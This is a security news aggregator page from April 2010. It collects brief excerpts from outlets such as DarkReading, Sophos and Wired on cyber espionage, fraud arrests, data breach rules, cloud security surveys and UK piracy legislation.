 Securing our networks doesn’t require some secret advanced NSA technology. It’s the boring network security administration stuff we already know how to do: keep your patches up to date, install good anti-malware software, correctly configure your firewalls and intrusion-detection systems, monitor your networks.... read more» 
   
 





 No-Brainer: How Agencies Can Secure IT 
 (from Government Information Security at 9-4-2010) 
 The Federal Information Security Management Act of 2003 was a positive step in improving security within the government. The law established the imperative for federal managers to put strong emphasis on cybersecurity. The bill highlighted the need to use a risk based approach to identify and implement the minimum controls and to establish an independent review process. While FISMA has many positive elements, the implementation of FISMA has been less than fully effective. For example, rather t... read more» 
   
 





 Identity theft is a serious problem at Douglas Port 
 (from douglasdispatch at 9-4-2010) 
 U.S. Customs and Border Protection officers stopped an identity theft when they arrested a man who was attempting to make entry into the United States by using someone else’s identity. On March 18th at about 5 p.m., CBP Officers became suspicious of a man who was attempting to make entry into the United States. The man was identified as a 43-year-old Mexican national from Michoacan, Mexico.... read more» 
   
 





 U.K. Approves Crackdown on Internet Pirates 
 (from The New York Times at 9-4-2010) 
 The British Parliament on Thursday approved plans to crack down on digital media piracy by authorizing the suspension of repeat offenders’ Internet connections. Following the House of Commons late Wednesday, the House of Lords on Thursday approved the bill after heavy lobbying from the music and movie industries, which say they suffer huge losses from unauthorized copying over the Internet.... read more» 
   
 





 The First Worldwide Cybersecurity Summit 
 (from baidu at 9-4-2010) 
 EWI’s Worldwide Cybersecurity Summit will bring together leaders of governments, businesses and civil society from around the world to determine new measures to ensure the security of the world’s digital infrastructure. While plenary speakers will offer visions for the future of cyberspace, the bulk of the summit will be highly interactive. It will give participants opportunities to collaborate with peers from around the world. The structure has two main components: there are eight sectors, w... read more» 
   
 





 Invitation to engage: Catalyst Conversation Starters 
 (from The Security Catalyst at 9-4-2010) 
 As a believer in the power of asking questions and engaging in conversation, I am starting a new monthly series: catalyst conversation starters. The idea is simple: ask a short question, share some thoughts, then open it up for everyone to participate through comments, the security catalyst community, on twitter and by telephone. As the catalyst, I’ll actively engage, ponder, probe and work to distill the discussion over the course of the month.... read more» 
   
 





 Hacker Voice Radio 
 (from Hackers Voice at 8-4-2010) 
 HVR is an online radio show set up as a vocal forum for all the UK hackers and phreaks to come together, work together and a place to share information. HVR is hosted by either Be|ia| or Naxxtor, frequent co-hosts are 10nix, _hyper_, Vesalius and Blue_Chimp - Tuesday, Wednesday and Thursday at 9pm GMT.... read more» 
   
 





 Microsoft Security Bulletin Advance Notification for April 2010 
 (from Microsoft at 8-4-2010) 
 Executive Summaries : This advance notification provides a number as the bulletin identifier, because the official Microsoft Security Bulletin numbers are not issued until release. The bulletin summary that replaces this advance notification will have the proper Microsoft Security Bulletin numbers (in the MSyy-xxx format) as the bulletin identifier. Affected Software : Microsoft Windows 2000 Microsoft Windows XP Microsoft Windows Server 2003 Microsoft Windows Vista Microsoft Windows... read more» 
   
 





 eSeminar - The National Security Challenge: Cross-Domain Information Sharing 
 (from Federal Computer Week at 8-4-2010) 
 Federal Computer Week will present Marianne Bailey, director of the Unified Cross Domain Management Office, in an eSeminar at 2 p.m. on Wednesday, April 14, to discuss the unique challenges facing government agencies as they work together to share critical, but not necessarily classified, national security information. As recent events with Flight 253 have highlighted, some of the most critical components of the intelligence enterprise lie not in the gathering of information, but in its disse... read more» 
   
 





 Kundra Outlines Infosec Priorities 
 (from Government Information Security at 8-4-2010) 
 The White House has formed an interagency working group to establish the National Cybersecurity Education Initiative. This working group defined four tracks of work that are now underway: * National awareness campaign led by the Department of Homeland Security; * Formal cybersecurity education program led by the Department of Education; * Federal workforce structure program led by the Office of Personnel Management and the Department of Defense; and * National workforce tra... read more» 
   
 





 Survey: Cloud computing risks outweigh reward 
 (from CNet at 8-4-2010) 
 Around 45 percent of IT professionals recently surveyed by the ISACA (formerly known as the Information Systems Audit and Control Association) said the risks involved in cloud computing outshine any benefits. A global organization focused on the auditing and security of information systems, the ISACA conducted its first annual IT Risk/Reward Barometer survey (PDF) in March. Questioning more than 1,800 IT professionals in the U.S. who are members of the group, the ISACA found that only 10 perc... read more» 
   
 





 Many U.S. Government Agencies Have Been Attacked, Survey Says 
 (from DarkReading at 8-4-2010) 
 IT workers in the U.S. federal government say their systems are already under attack, and they don't expect the situation to get better in coming months. According to a survey published today by Clarus Research Group and Lumension, nearly three-quarters of federal IT decision-makers who work in national defense and security departments or agencies say the possibility is "high" for a cyberattack by a foreign nation in the next year. One-third of these respondents say they have already exper... read more» 
   
 





 Google Gives the US Government Access To Gmail 
 (from Slashdot at 8-4-2010) 
 Google condemns the Chinese Government for censoring its results, and Australia for planning to do the same. Meanwhile, its lawyers and security experts have told employees to 'be intentionally vague about whether or not we've given access to end-user accounts,' according to engineer James Tarquin, hinting that Google may be sharing its data with the US government. Perhaps Australia's most hated communications minister, Steven Conroy, could be right in his criticism of Google's privacy record af... read more» 
   
 





 ICO vows to impose heavy fines for major data breaches 
 (from Computing at 8-4-2010) 
 The Information Commissioner’s Office (ICO) has said that it will reserve its new-found power to impose fines of up to £500,000 if cases similar to that involving T-Mobile in November 2009 were to arise again. The ICO has been investigating the mobile network provider after employees allegedly sold details relating to customers’ mobile phone contracts, including their contract expiry dates. It is alleged that the information was being sold on to the service provider’s competitors, whose agent... read more» 
   
 





 Facebook users still unhappy with privacy options 
 (from the tech herald at 8-4-2010) 
 Facebook users are still reacting to proposed privacy settings, and overall are still unhappy with the previous changes to the way personal information is handled by the social networking giant. A recent reader poll by Sophos showed that 95-percent of the 680 users who participated were displeased by the newest proposed changes, and according to Facebook, there were over 4,000 comments on the subject when they opened the proposal to public comment. However, while the Sophos data shows a cl... read more» 
   
 





 Outsourced security extends to wealth of services, study finds 
 (from TechTarget at 8-4-2010) 
 Companies are choosing managed security service providers (MSSPs) to do more than block spam and encrypt email messages. Interest is growing in non-traditionally outsourced security technologies, including log management and patch and configuration management. The market for security services providers grew by about 8% in 2009, despite the economic turmoil that stagnated some security budgets. And the growth is not necessarily all about cutting costs, said Khalid Kark, vice president and pri... read more» 
   
 





 Romanian police, FBI break up 70-strong eBay fraud ring 
 (from scmagazineus at 8-4-2010) 
 Romanian authorities, in conjunction with U.S. law enforcement, have arrested 70 individuals from three different organized cybercrime groups on charges they perpetrated online auction scams that targeted eBay users. The arrests were the result of a string of raids organized by the Romanian Directorate for Investigating Organized Crime and Terrorism (DIICOT), the agency said in a news release issued on Sunday.... read more» 
   
 





 'Cyber War' author: U.S. needs radical changes to protect against attacks 
 (from NetworkWorld at 8-4-2010) 
 In his new book, Cyber War, Richard Clarke says nations are building up their online armies and weapons largely far from public view, increasing the danger of a deliberate or accidental cyberwar, which in turn could trigger violent conflicts across the globe. "Cyber war has already begun," Clarke writes. "In anticipation of hostilities, nations are already preparing the battlefield.' They are hacking into each other's networks and infrastructures, laying in trapdoors and logic bombs -- now, i... read more» 
   
 





 Security through virtualisation 
 (from h-online at 8-4-2010) 
 A separate virtual system for every task -- that's the basic formula of Qubes' security concept. Qubes, a new operating system presented by Joanna Rutkowska, plans to limit any damage malicious software might do; so even if the game just tested turns out to be a trojan or an attacker is exploiting a WiFi driver bug, our online banking credentials are not at risk. They are safely stored in the banking VM, which runs nothing but online banking.... read more» 
   
 





 Europe Learns The Truth(s) About ACTA 
 (from ip-watch at 8-4-2010) 
 The truth about the Anti-Counterfeiting Trade Agreement (ACTA) is different depending on which side you are on. At a hearing organised by the Liberal Party Group in the European Parliament in Brussels yesterday Canadian law professor and ACTA expert Michael Geist challenged the position of the European Commission and other negotiating parties to the agreement that ACTA would not lead to substantive law changes in the ACTA countries and also explained what possible long-term effects could resu... read more» 
   
 





 HITECH Act increases HIPAA security requirements 
 (from TechTarget at 8-4-2010) 
 The health care industry was buzzing with the news: For the first time ever, a hospital was being audited for compliance with HIPAA security requirements. The audit of Piedmont Hospital in Atlanta by the U.S. Department of Health and Human Services' inspector general in 2007 was surprising for hospitals, health insurers and others in an industry accustomed to a lack of enforcement of federal privacy and security requirements. A year later, HHS took another unusual step, meting out a $100,000 ... read more» 
   
 





 3 Year Sentence For Hacker Who Ripped Off Charles Schwab Accounts 
 (from Forbes at 8-4-2010) 
 A computer hacker who stole a total of $246,000 from Charles Schwab brokerage accounts was sentenced to 37 months' imprisonment in federal court in Manhattan yesterday. Aleksey Volynskiy of Manhattan worked with a crew of Russia-based hackers in 2006 and 2007 to pilfer the Schwab customers' cash and funnel it out of the U.S., according to court papers. The high-tech thieves used "Trojan horse" viruses to steal Internet users' personal account information unnoticed.... read more» 
   
 





 Companies Lag On Cloud Security 
 (from SecurityProNews at 8-4-2010) 
 Most organizations lack the procedures, policies and tools to ensure sensitive information they put in the cloud remains secure, according to a new survey by Symantec and the Ponemon Institute. Despite security concerns and the expected growth in cloud computing, only 27 percent of respondents said their organizations have steps in place for approving cloud applications that use sensitive or confidential information. In most organizations, large gaps exist between those currently evaluating ... read more» 
   
 





 Hackers using search engine optimisation techniques, says Sophos 
 (from ComputerWorldUk at 8-4-2010) 
 IT security firm Sophos has conducted new research which reveals the automated tools used by Search Engine Optimisation (SEO) hackers and how companies can protect themselves. Sophos said the business of using blackhat SEO techniques to impregnate legitimate sites has become a huge money-spinner for cybercriminals. Every day scores of new malicious campaigns are discovered taking advantage of the hottest news stories on the internet to spread malware; many of them profiting from high profile d... read more» 
   
 





 Researcher Details New Class Of Cross-Site Scripting Attack 
 (from DarkReading at 8-4-2010) 
 A new type of cross-site scripting (XSS) attack that exploits commonly used network administration tools could be putting users' data at risk, a researcher says. Tyler Reguly, lead security research engineer at nCircle, today published a white paper outlining a new category of attack called "meta-information XSS" (miXSS), which works differently than other forms of the popular attack method -- and could be difficult to detect. "Think about those network administration utilities that so man... read more» 
   
 





 Digital Economy Bill passed along by empty House of Commons 
 (from ComputerWorldUk at 8-4-2010) 
 The Digital Economy Bill has been passed to the final stage before becoming law, after a minor debate in which only a handful of the country's 646 MPs turned up. In a near-empty House of Commons yesterday, the bill was passed through to the 'wash-up' phase where legislation is rushed through before an election. It will go to a House of Lords debate this afternoon. Industry insiders said it was highly likely, but not definite, that the Lords would pass the bill into law – though some sectio... read more» 
   
 





 Retailers warned of cyber attacks 
 (from businessworld at 8-4-2010) 
 Credit and debit card firm Visa has issued an alert warning all retailers that cyber-crime attacks on businesses are on the rise, with Windows-based terminals being particularly vulnerable. The rising number of key-logger attacks - where criminals hack a computer and can record the key-strokes on retailers' till terminals - is due to the fact that many units are Windows-driven and therefore susceptible to the same type of malware infections as office and home PCs.... read more» 
   
 





 Warning: Infrastructure not ready for imminent cyber attacks 
 (from Government Computer News at 8-4-2010) 
 An information technology security strategy based on regulatory compliance has left agencies ill-prepared to respond to a constant stream of cyber attacks, according to a recent survey of federal information technology officials commissioned by Lumension Security. “The government view of compliance is very prescriptive,” said Matt Mosher, Lumension's senior vice president for the Americas. “They take security seriously because they are under attack. The government’s reaction is to drive secur... read more» 
   
 





 Report Alleges Vast Cyber Crime Syndicate in China 
 (from esecurityplanet at 8-4-2010) 
 A sophisticated network of hackers operating out of China has launched cyber attacks against the computer systems of the office of the Dalai Lama, the United Nations, the Indian government and other nations, according to a new report released this week. Security researchers at the Information Warfare Monitor and the Shadowserver Foundation said they recovered a large quantity of sensitive documents in their investigation, including classified materials filched from India's national security a... read more» 
   
 





 Mandybill: All the Commons drama 
 (from The Register at 8-4-2010) 
 Live TV and internet coverage allowed the nation to feel grubby as the Mandybill was shunted through the House of Commons late last night. The government’s replacement for Clause 18 – a catch-all illiberal web-blocking measure that few in the music business ever expected to survive – was approved, and the photographers cemented a spectacular victory by crushing the orphan works clause. But not before a bit of spirited resistance – or token posturing – take your pick, for in truth it was a ... read more» 
   
 





 Needed: Isolated network to thwart cyber theft 
 (from expressbuzz at 8-4-2010) 
 The massive hacking by a Chinese espionage network into the Indian Government’s defence and other confidential information has exposed the vulnerability of cyber security in the country. In the wake of the incident, cyber security experts point out the need for having an isolated network for securing critical information. It has come to light that critical and confidential information was leaked through social networking sites and other similar websites. Cyber security experts say that... read more» 
   
 





 ID Theft Ring Gleaned Socials From Medical Records 
 (from Finextra at 8-4-2010) 
 Medical identity theft occurs when the perpetrator uses your name and in some cases other aspects of your identity, such as insurance information, to obtain medical treatment or medication or to make false claims for treatment or medication. As a result, erroneous or fraudulent entries wind up on your medical records, or sometimes entirely fictional medical records are created in your name. Financial identity theft as it relates to new account fraud is when an identity thief gets the victim’... read more» 
   
 





 Green data centre standard agreed by US, Japan and Europe 
 (from TechWorld at 8-4-2010) 
 Industry groups and government agencies from the US, Europe and Japan have reached a basic agreement on how to measure the energy efficiency of data centres. The agreement is seen as significant because it establishes a common metric that different types of data centres, in different parts of the world, can use to report their level of energy efficiency. That could provide a yardstick for companies to assess the efficiency of their own data centres, and also to gauge the effectiveness of energy-... read more» 
   
 





 New approach allows computer programs to run up to 20% faster 
 (from DNAIndia at 8-4-2010) 
 A new approach to software development, designed by researchers at North Carolina State University, could allow common computer programs to run up to 20% faster and possibly incorporate new security measures. For the first time, researchers have found a way to run different parts of some programs, including such widely used programs as word processors and Web browsers, at the same time. This makes the programs operate more efficiently.... read more» 
   
 





 Report: Chinese Hackers Target India 
 (from enterprise-security-today at 8-4-2010) 
 China-based hackers stole Indian national security information, 1,500 e-mails from the Dalai Lama's office and other sensitive documents, a new report said Tuesday. Researchers at the University of Toronto said they were able to observe the hacking and trace it to core servers located in China and to people based in the southwestern city of Chengdu. The researchers said they monitored the hacking for the past eight months. The report said it has no evidence of involvement by the Chinese go... read more» 
   
 





 Vietnam Calls Malware Claims 'Groundless' 
 (from enterprise-security-today at 8-4-2010) 
 Vietnam has dismissed what it called "groundless" accusations from Google and McAfee that the communist country had apparently used malicious computer programs to hack Web sites and spy on political opponents. Google Inc. said Vietnam had apparently used software known as "malware" to snoop on opponents of a controversial bauxite mine planned for Vietnam's Central Highlands. It said the cyberattacks had targeted "potentially tens of thousands of people."... read more» 
   
 





 Research into Nigerian 419 Scam Could Lead to Improved Anti-Phishing Technologies 
 (from Physorg at 8-4-2010) 
 For seven years, Harriet Ottenheimer, a K-State professor emeritus of anthropology and a Fulbright scholar to the Czech Republic, and her son, Davi Ottenheimer, president of security consultancy flyingpenguin, collected and analyzed Nigerian 419 e-mails for clues that could be used to block these messages. These spam e-mails are called Nigerian 419 messages, or 419 for short. The number "419" refers to an article of the Nigerian Criminal Code concerning fraud. Typically the messages ask for t... read more» 
   
 





 North Korea's "Red Star" Software System 
 (from Thesop at 8-4-2010) 
 Korea is often declared to be the world's most computer-literate, wired, online society. Of course, that is the southern version. The northern one apparently lags behind, to say the least. The "Red Star" computer operating system has some good and bad points, as all computer operating systems invariably do. On the plus side, according to a Reuters report, it has "good startup music", the Korean folk song "Arirang", which is popular on both sides of the border. And it features world-class secu... read more» 
   
 





 How to Track a Hacker 
 (from The New New internet at 8-4-2010) 
 Bill O’Reilly, Paris Hilton and Sarah Palin have one thing in common, apart from being celebrities: They’ve all been victims of hacking. Although the media spotlight hit all three public figures, it was Palin’s bad fortune that got the most attention. Right before the presidential election in 2008, a hacker gained unauthorized access to the vice president hopeful’s personal email account gov.palin@yahoo.com. It wasn’t hard for the hacker to figure out her security questions (her date of birth... read more» 
   
 





 Botnets 'the Swiss Army knife of attack tools' 
 (from ComputerWorld at 8-4-2010) 
 Hacker militias reach for the closest tool at hand -- botnets already up and running, already reaping ill-gotten gains -- when they mobilize to attack the information infrastructure of other countries, security experts say. "They just pick up what they use every day," said Joe Stewart, director of malware analysis at SecureWorks Inc. and a noted botnet researcher. "[Militias] don't have much time to ramp up, just days, so it has to be something already in use."... read more» 
   
 





 Hackers using Twitter for cyber spying 
 (from thechronicleherald at 8-4-2010) 
 Ottawa must take urgent action on cyberspace security, or risk falling victim to targeted attacks by hackers using social media such as Twitter to glean secret government or corporate information, Canadian researchers said Tuesday. The team of researchers from the University of Toronto and Ottawa-based SecDev Group released a report Tuesday documenting a complex cyber espionage system of Chinese hackers. Twitter and email were among the tools used to access highly sensitive documents from ... read more» 
   
 





 Security training won't solve the negligent insider threat 
 (from scmagazineus at 8-4-2010) 
 2010 was barely underway before news of the year's first sensational data breach hit the wires. Internet giant Google announced that it was the victim of a sophisticated attack from China designed to break into accounts of political dissidents hosted by the company. Details are scant, but one disclosure in particular does stand out.... read more» 
   
 





 Korea reigns as king of malware threats 
 (from infosecurity-us at 8-4-2010) 
 The US has lost its place atop the leader board as the chief source of malware in March, as research from Network Box indicates Korea – mainly South Korea – can now claim the top spot when phishing attempts are included in the statistics. Security services provider Network Box, in its analysis of March internet threats, said that Korea was the source of the most malware as a percentage for the month, coming in at just under one-third (31.1%) of all viruses being distributed via the internet.... read more» 
   
 





 Let's not create a cyberbullying panic 
 (from CNet at 8-4-2010) 
 Recent stories in the press about teenage cyberbullying and real-world bullying are sickening. It's hard to know how much cyberbullying contributed to her decision to kill herself, but the case of Phoebe Prince brings tears to my eyes. The South Hadley, Mass., 15-year-old was reportedly the brunt of repeated cruelty at the hands of classmates (six of whom are now facing criminal charges) until she put an end to her life.... read more» 
   
 





 Student blocked access to finish degree: Addicted to Facebook? 
 (from ZDNet at 8-4-2010) 
 Students around the world are facing, in some cases, their last week at university, with looming deadlines and essay and dissertations to submit. Many have already finished, but some like myself have until the end of this week to hand in everything they have before the scrutiny of their academic achievements are met and their degree classification is out of their hands. I assure you: being a student at this time of year is far from stress free. Students worldwide are sweating like a Vegas Elv... read more» 
   
 





 Israel using Facebook as 'spying tool' in Gaza 
 (from The Register at 8-4-2010) 
 Hamas has accused Israel of using Facebook to recruit spies from among the Palestinian community in the Gaza strip. For years Israel has maintained a network of agents in the West Bank and Gaza. Those discovered face torture and almost certain execution as collaborators. Hamas reckons fans of Bookface and similar services are giving away too much personal information on social networking sites and this, in turn, leaves them open to attempts to coerce them into becoming spies. How someone can ... read more» 
   
 





 Opening Keynote: Mike McConnell (Symposium Summary) 
 (from Cerias at 8-4-2010) 
 Mike McConnell, retired Admiral of the Navy, former Director of NSA and former Director of National Intelligence delivered the opening keynote speech for the eleventh annual CERIAS Security Symposium. The majority of this keynote was devoted to recounting his experiences and efforts to move forward national cyber capabilities. The following is a summary of those efforts.... read more» 
   
 





 Panel #3: The Evolution of Research Funding and Projects (Symposium Summary) 
 (from Cerias at 8-4-2010) 
 The panel was started by Petros Mouchtaris. He said that applying for funding is not that bad although the researcher gets a lot of rejections, but then also once the funding comes through it gives the researcher a lot of control about the areas he wants to work in. He said in the last 10 years most of their funding came from DARPA, initially the funding was for long-term small projects. He said that a smaller, long-term project gives more time to foster basic research about abstract ideas.... read more» 
   
 





 'Activist' UCSD professor facing unusual scrutiny 
 (from SignOnSanDiego at 8-4-2010) 
 UCSD professor Ricardo Dominguez is facing unusual scrutiny from campus police and auditors for his involvement in two divisive projects — one that helps migrants find water stored along the border and another that disrupted the UC president’s Web site through a virtual sit-in. Dominguez, 50, is a self-described activist and new media artist who is accustomed to stirring up controversy. But he said he’s troubled that his tenured status may be revoked for work that promotes his academic specia... read more» 
   
 





 Many managers see cloud computing as risky business 
 (from Computer World at 8-4-2010) 
 Despite the hoopla surrounding cloud computing, almost half of U.S. IT managers are still wary of using cloud computing services within their own operations, according to the results of a survey released Wednesday by the Information Systems Audit and Control Association (ISACA). In the ISACA IT Risk/Reward Barometer, an online survey that attracted 1,809 responses from ISACA members, 45 percent of the participants indicated that the risks of cloud computing outweigh the benefits.... read more» 
   
 





 Why Hackers Love the Cloud 
 (from Arbornetworks at 8-4-2010) 
 The growth of cloud services has led many enterprises to move data and applications to the cloud, but the hacker community is also moving there. With content consolidation and multi-tenant infrastructures come more opportunities for hackers to steal data or conduct DDoS attacks with greater ease. Danny McPherson, VP and Chief Security Officer at Arbor Networks, discusses some of the ways hackers are eyeing cloud services and what IT can do to face these threats. (12:51)... read more» 
   
 





 Data loss a mystery for many businesses 
 (from Computer World at 8-4-2010) 
 Despite the increasing awareness of penalties and the damage that losing personal data can do to corporate reputations, network security executives are getting less certain that they can figure out if personal data has been compromised when corporate laptops are lost or stolen. When TheInfoPro asked the security professionals in the middle of last year, 40% said they could not determine if personally identifiable information (PII) was lost in cases of laptops gone missing. Six months later, t... read more» 
   
 





 DeepSec: In-Depth Security Conference 2010 Europe — Date TBA 
 (from deepsec at 8-4-2010) 
 The In-Depth security conference will include two days of security talks during the conference and two days of trainings, covering the latest topics in network and IT security. There will also be a comprehensive social program around the event. We're inviting you to submit proposals for trainings and conference talks. All proposals received before July 31st 2010, 23:59 CEST will be considered by the program committee. Topics of special interest include: - Operating System Security (7, X... read more» 
   
 





 Maley: Here's How Firing REALLY Went Down 
 (from CSOonline at 8-4-2010) 
 Former State of Pennsylvania CISO Robert Maley has been watching all the news about his firing for talking about a security incident without permission at last month's RSA conference. He wants everyone to know that they shouldn't believe everything they read and hear. He began a talk on application security at CSO Perspectives 2010 Tuesday by going off topic and addressing the controversy head on. He said he was at RSA while on vacation because the state had cut the security budget by 38 perc... read more» 
   
 





 Wikipedia as IP theft enabler? - Wikipedia and the Matter of Responsibility 
 (from Acmuller at 8-4-2010) 
 For many, and perhaps the majority of web users, Wikipedia is simply wonderful. For me, however, as a person devoted to the development of rigorous and responsible online reference works, Wikipedia is like a cancer growing on the Internet, silently and anonymously leeching off all the creative work from web pages developed by various artists and intellectuals. By the time you happen to find your work copied onto Wikipedia, it has already been propagated all over the net by Wikipedia copycats, ma... read more» 
   
 





 Romania Swoops In on 70 Cybertheft Suspects 
 (from Wired at 8-4-2010) 
 Romanian police arrested 70 suspects Tuesday who they claim were involved in eBay scams and other cybercrimes since 2006. Believed to be members of three separate gangs, the scammers used phishing attacks to get the login credentials of eBay account holders, then used the accounts to auction nonexistent goods. Police have identified approximately 800 victims who sent money for non-existent Rolex watches, cars, yachts, private airplanes and other luxury goods. Buyers from around the world lost... read more» 
   
 





 It’s Cyberwar! Let’s Play Bingo! 
 (from Wired at 8-4-2010) 
 While it’s clear from the cyberwar news that we are living in a war zone when we turn on our computers, we at Wired.com refuse to surrender — even at the risk of taking an e-bullet in the name of Freedom. So strap on your iFlak jackets and use this Wired.com CyberWar bingo card the next time you go to read a Cyberwar story. If you can’t figure out where to start, try this piece from NPR.... read more» 
   
 





 ISP Privacy Proposal Draws Fire 
 (from KrebsonSecurity at 8-4-2010) 
 A proposal to let Internet service providers conceal the contact information for their business customers is drawing fire from a number of experts in the security community, who say the change will make it harder to mitigate the threat from spam and malicious software. The American Registry for Internet Numbers (ARIN) — one of five regional registries worldwide that is responsible for allocating blocks of Internet addresses – later this month will consider a proposal to ease rules that requir... read more» 
   
 





 Romanian police arrest 70 phishers and fraudsters 
 (from Sophos at 8-4-2010) 
 Police in Romania have announced that they have arrested 70 people, breaking up three separate gangs involved in organised cybercrime in the process. The raids across the country followed an investigation by the Directorate for Investigating Organised Crime and Terrorism (DIICOT) which worked closely with the FBI in identifying over 800 victims of the gangs. Hundreds of officers were involved in the arrests, in collaboration with members of the US Secret Service based from the US Embassy in B... read more» 
   
 





 Cyber criminals target executives 
 (from mis-asia at 8-4-2010) 
 Mass indiscriminate computer attacks are giving way to highly targeted individual attempts in a new wave of professional cyber crime, experts say. Right now millions of computers are being targeted all over the world. At one point last week, home computers and telecommunications companies were the two user groups most under threat worldwide. In Australia alone, 2.95 million attacks have been detected, originating mainly from Canada, the US and China. According to Symantec, the maker of Norton... read more» 
   
 





 Telecom says XT restored in Nth Island 
 (from Tvnz at 8-4-2010) 
 Telecom says all XT issues affecting the top of the North Island are now restored and running as normal. Some XT customers in the north of the North Island, including Auckland, experienced intermittent problems on Thursday. The issues affected some cellsites linked to one of the Auckland-based RNCs. The two Christchurch-based RNCs, and the second Auckland-based RNC were unaffected. Telecom says it is still trying to work out what caused Thursday's outage.... read more» 
   
 





 Sophos Security Chet Chat episode 4 
 (from Sophos at 8-4-2010) 
 I am pleased to announce the publication of Sophos Security Chet Chat, Episode 4. We started this weekly podcast series a month ago and I am pleased that we have settled into a good rhythm and delivered all of the podcasts on schedule. The purpose of this series is to provide between 7 and 15 minutes of content on a weekly basis that draws your attention to the important security and privacy issues and threats of the past 7 days.... read more» 
   
 





 Visual artists sue Google over copyright issues 
 (from CNN at 8-4-2010) 
 Photographers and illustrators filed a lawsuit against Google today, claiming that the search engine displays copyrighted images in books it scans, without fairly compensating the people who created the images. The American Society of Media Photographers is leading the class-action lawsuit, which was filed today in U.S. District Court in New York, according to a news release. Visual artists were not allowed to join a previous lawsuit filed against Google by book authors and publishers, who... read more» 
   
 





 Judge in Sarah Palin e-mail hacking case denies motion challenging computer search 
 (from Computer World at 8-4-2010) 
 FBI agents did not violate alleged hacker David Kernell's Fourth Amendment rights when they searched through the entire contents of his computer in connection with their investigation, a federal magistrate judge ruled this week in the Sarah Palin e-mail hacking case. In a 41-page ruling this week, Judge Clifford Shirley in Knoxville denied Kernell's motions to quash the information gathered from those searches and said that no unreasonable search or seizure had taken place, as Kernell had cla... read more» 
   
 





 Biometrics Briefing paper - makes you blink? 
 (from hostexploit at 8-4-2010) 
 Some key findings of the recent ENISA briefing paper include: - They are most useful when you are using more than one type of biometric at the same time, and as a complement to more robust methods - Some behavioural biometrics require specialised and sometimes highly obtrusive equipment which may be off-putting to users. - Other behavioural biometrics offer a completely unobtrusive technique to identify or classify individuals. - Such unobtrusiveness may be challenging from the point ... read more» 
   
 





 Internet hackers make a Twit out of red-faced Boyle 
 (from Independent at 8-4-2010) 
 GREEN Party Senator Dan Boyle has become a victim of internet hackers who took over his celebrated Twitter account. The junior coalition party chairman's online messaging infamously kickstarted the Greens' dramatic U-turn on former Defence Minister Willie O'Dea. Just hours after the Greens' six TDs voted to back Mr O'Dea two months ago, Mr Boyle told the world via Twitter that he didn't have confidence in him.... read more» 
   
 





 Schmidt: Private Sector Key to Stopping Google-style Attacks 
 (from Computer World at 8-4-2010) 
 White House Cybersecurity Coordinator Howard Schmidt says the information security community is right to be spooked by massive, coordinated attacks that recently targeted Google. But he rejects the notion that this is cybergeddon, and believes the best defense remains in the hands of the private sector. Schmidt was at CSO Perspectives to deliver a keynote talk on the changing face of cybersecurity and update attendees on the government's Comprehensive National Cybersecurity Initiative (CNCI).... read more» 
   
 





 Hackers: not just geeks, but activists 
 (from The Star at 8-4-2010) 
 The word “hacker” conjures up a vision of a geek in a basement, snickering diabolically as he steals identities or credit card numbers. But, as Tuesday’s news out of U of T shows, sometimes hackers are good guys. Members of the university’s Citizen Lab cracked the Shadow Network, a Chinese-based espionage ring that had been pilfering sensitive international information, including visa applications Canadians submitted to the Indian government.... read more» 
   
 





 Internode finds bug in Ericsson DSLAMs 
 (from SecureComputing at 8-4-2010) 
 ISP Internode has discovered a software flaw that has crippled some of the Ericsson-branded Ethernet controller nodes (ECNs) on its network - a flaw that may lie dormant within the networks of other service providers. Internode's managing director Simon Hackett posted a lengthy technical explanation of the issue late last week, which had caused broadband service issues in some exchanges in South Australia. Hackett said the fault had been "traced to a software bug in one of the multiple sof... read more» 
   
 





 Breaches in the past could be more damaging 
 (from India Times at 8-4-2010) 
 This was revealed by the Canadian group that first uncovered the existence of a global espionage network GhostNet in 2009. Breaches and exfiltration of documents and even constant snooping through cyber networks that happened in the past could potentially be more damaging. They accessed encrypted diplomatic communication, confidential documents related to India’s relations with and activities in regions such as West Africa, Russia and the CIS states. They exfiltrated secret assessments of I... read more» 
   
 





 White Paper - HIPAA and HITECH Act Essentials for Healthcare Executives 
 (from BitPipe at 7-4-2010) 
 Many years ago, the Health Insurance Portability and Accountability Act (HIPAA) promised to overhaul the healthcare industry by, in part, mandating protective measures on sensitive healthcare records. The HIPAA Privacy and Security Rules ended up not having the impact many expected. Years after both rules took effect, data breaches are still occurring. This era may soon come to an end. The Health Information Technology for Economic and Clinical Health Act (a.k.a. HITECH Act) – which officially t... read more» 
   
 





 Hacking, a growing menace in China (symc, ibm, goog, yhoo) 
 (from benzinga at 7-4-2010) 
 According to a report by the Financial Times, with 400 million people, China has the biggest population of internet users. Probably the country also has the world’s biggest population of hackers. According to a report by MessageLabs, a research arm of Symantec (NASDAQ: SYMC), last month, China became the biggest source of targeted hacking attacks. Eagle Wan, a veteran Chinese hacker now working for IBM (NYSE: IBM), says, “there are no more than 1000 people in China who are capable of produc... read more» 
   
 





 Webcast - All Things Cyber: What's Next for the Cyber Enterprise? 
 (from defense systems at 7-4-2010) 
 Today’s cyber landscape is rapidly evolving and expanding. The modern enterprise manager must incorporate all aspects of the enterprise when developing policy, defining and updating business processes, and performing risk assessments before taking action. The warfighter adds yet another dimension of complexity as the New Cyber Domain is now integrated across all mission elements. Effective cyber Solutions today will blend mission, people, process and technology. Join our webcast to learn: ... read more» 
   
 





 Could a single hacker crash a country's network? 
 (from howstuffworks at 7-4-2010) 
 You know you're living in the new millennium when one of the Obama administration's newest positions is nicknamed the "cyberczar." In May 2009, President Obama formally announced his plans to appoint a national cybersecurity adviser, charged with protecting computer networks in the United States -- which Obama referred to as "strategic national assets" -- from hacking and spying. Cybersecurity isn't a new topic making the rounds in Washington. In 2007, the Commission on Cybersecurity for the ... read more» 
   
 





 Potential Risk to Blood Supply Probed 
 (from WSJ at 7-4-2010) 
 An infectious virus linked to two diseases is drawing the attention of public-health officials, who are investigating the potential threat to the nation's blood supply. It isn't clear if the virus, known as XMRV, poses a danger, and public-health officials say there isn't evidence of spreading infection. But because of concern over the potential for widespread infection and preliminary evidence that XMRV is transmitted similarly to HIV, officials are quickly trying to determine if action is n... read more» 
   
 





 Feds Add 4 More Major Breaches to List 
 (from healthcareinfosecurity at 7-4-2010) 
 Federal regulators have added four more breaches to the tally of major healthcare incidents, with 56 cases now reported since September 2009, when new federal reporting requirements kicked in. Since Feb. 22, the Office for Civil Rights within the U.S. Department of Health and Human Services has been regularly updating on its Web site a list of organizations that have notified HHS about a breach of unsecured health information involving more than 500 individuals.... read more» 
   
 





